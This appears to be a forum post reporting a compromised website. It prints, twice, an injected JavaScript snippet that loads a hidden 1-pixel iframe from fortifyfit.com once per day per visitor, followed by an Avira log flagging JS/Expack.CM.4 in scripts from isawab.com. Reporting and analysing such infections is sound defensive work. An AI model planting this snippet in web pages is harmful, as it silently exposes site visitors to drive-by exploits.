| 复制代码function zzzfff() {
     var qkab = document.createElement('iframe');
     qkab.src = 'http://fortifyfit.com/cnt.php';
     qkab.style.position = 'absolute';
     qkab.style.border = '0';
     qkab.style.height = '1px';
     qkab.style.width = '1px';
     qkab.style.left = '1px';
     qkab.style.top = '1px';
     if (!document.getElementById('qkab')) {
         document.write('<div id=\'qkab\'></div>');
         document.getElementById('qkab').appendChild(qkab);
     }
 }
 function SetCookie(cookieName, cookieValue, nDays, path) {
     var today = new Date();
     var expire = new Date();
     if (nDays == null || nDays == 0) nDays = 1;
     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
 }
 function GetCookie(name) {
     var start = document.cookie.indexOf(name + "=");
     var len = start + name.length + 1;
     if ((!start) && (name != document.cookie.substring(0, name.length))) {
         return null;
     }
     if (start == -1) return null;
     var end = document.cookie.indexOf(";", len);
     if (end == -1) end = document.cookie.length;
     return unescape(document.cookie.substring(len, end));
 }
 if (navigator.cookieEnabled) {
     if (GetCookie('visited_uq') == 55) {} else {
         SetCookie('visited_uq', '55', '1', '/');
         zzzfff();
     }
 }
 复制代码function zzzfff() {
     var woci = document.createElement('iframe');
     woci.src = 'http://fortifyfit.com/cnt.php';
     woci.style.position = 'absolute';
     woci.style.border = '0';
     woci.style.height = '1px';
     woci.style.width = '1px';
     woci.style.left = '1px';
     woci.style.top = '1px';
     if (!document.getElementById('woci')) {
         document.write('<div id=\'woci\'></div>');
         document.getElementById('woci').appendChild(woci);
     }
 }
 function SetCookie(cookieName, cookieValue, nDays, path) {
     var today = new Date();
     var expire = new Date();
     if (nDays == null || nDays == 0) nDays = 1;
     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
 }
 function GetCookie(name) {
     var start = document.cookie.indexOf(name + "=");
     var len = start + name.length + 1;
     if ((!start) && (name != document.cookie.substring(0, name.length))) {
         return null;
     }
     if (start == -1) return null;
     var end = document.cookie.indexOf(";", len);
     if (end == -1) end = document.cookie.length;
     return unescape(document.cookie.substring(len, end));
 }
 if (navigator.cookieEnabled) {
     if (GetCookie('visited_uq') == 55) {} else {
         SetCookie('visited_uq', '55', '1', '/');
         zzzfff();
     }
 }
 Avira
 
 2013/7/11 上午 06:43 [System Scanner] 掃描掃描結束 [已完成全部的掃描。]。
 檔案數:        826
 目錄數:        0
 惡意程式碼數:        1
 警告數:        0
 
 2013/7/11 上午 06:43 [System Scanner] 發現惡意程式碼
 檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
 Files\Low\Content.IE5\VUGD722P\jquery[4].js'
 包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
 已採取動作:
 檔案會移動至 '54d970fe.qua' 名稱底下的隔離區目錄。.
 
 2013/7/11 上午 06:43 [System Scanner] 掃描
 掃描結束 [已完成全部的掃描。]。
 檔案數:        826
 目錄數:        0
 惡意程式碼數:        1
 警告數:        0
 
 2013/7/11 上午 06:43 [System Scanner] 發現惡意程式碼
 檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
 Files\Low\Content.IE5\UL724GWW\isawab_com[1].htm'
 包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
 已採取動作:
 檔案會移動至 '55427294.qua' 名稱底下的隔離區目錄。.
 
 2013/7/11 上午 06:40 [Real-Time Protection] 發現惡意程式碼
 在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
 Files\Low\Content.IE5\VUGD722P\jquery[4].js 中
 偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
 執行的動作:傳輸至掃描程式
 
 2013/7/11 上午 06:40 [Web Protection] 發現惡意程式碼
 從 URL "http://isawab.com/javascripts/jquery.js" 存取資料時,
 發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
 已採取動作:已略過
 
 2013/7/11 上午 06:40 [Real-Time Protection] 發現惡意程式碼
 在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
 Files\Low\Content.IE5\VUGD722P\jquery[4].js 中
 偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
 執行的動作:拒絕存取
 
 2013/7/11 上午 06:40 [Web Protection] 發現惡意程式碼
 從 URL "http://isawab.com/javascripts/fancybox/jquery.fancybox-1.3.1.pack.js"
 存取資料時,
 發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
 已採取動作:封鎖的檔案
 
 2013/7/11 上午 06:40 [Web Protection] 發現惡意程式碼
 從 URL "http://isawab.com/javascripts/jquery.scroll.js" 存取資料時,
 發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
 已採取動作:封鎖的檔案
 
 2013/7/11 上午 06:40 [Web Protection] 發現惡意程式碼
 從 URL "http://isawab.com/javascripts/slickapp.js" 存取資料時,
 發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
 已採取動作:封鎖的檔案
 
 2013/7/11 上午 06:40 [Web Protection] 發現惡意程式碼
 從 URL "http://isawab.com/javascripts/jquery.serialScroll.js" 存取資料時,
 發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
 已採取動作:封鎖的檔案
 
 2013/7/11 上午 06:40 [Web Protection] 發現惡意程式碼
 從 URL "http://isawab.com/javascripts/jquery.tools.js" 存取資料時,
 發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
 已採取動作:將檔案移至隔離區
 
 2013/7/11 上午 06:40 [Real-Time Protection] 發現惡意程式碼
 在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
 Files\Low\Content.IE5\UL724GWW\isawab_com[1].htm 中
 偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
 執行的動作:傳輸至掃描程式
 
 2013/7/11 上午 06:40 [Real-Time Protection] 發現惡意程式碼
 在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
 Files\Low\Content.IE5\UL724GWW\isawab_com[1].htm 中
 偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
 執行的動作:拒絕存取
 
 2013/7/11 上午 06:40 [Web Protection] 發現惡意程式碼
 從 URL "http://isawab.com/" 存取資料時,
 發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
 已採取動作:已略過
 
   |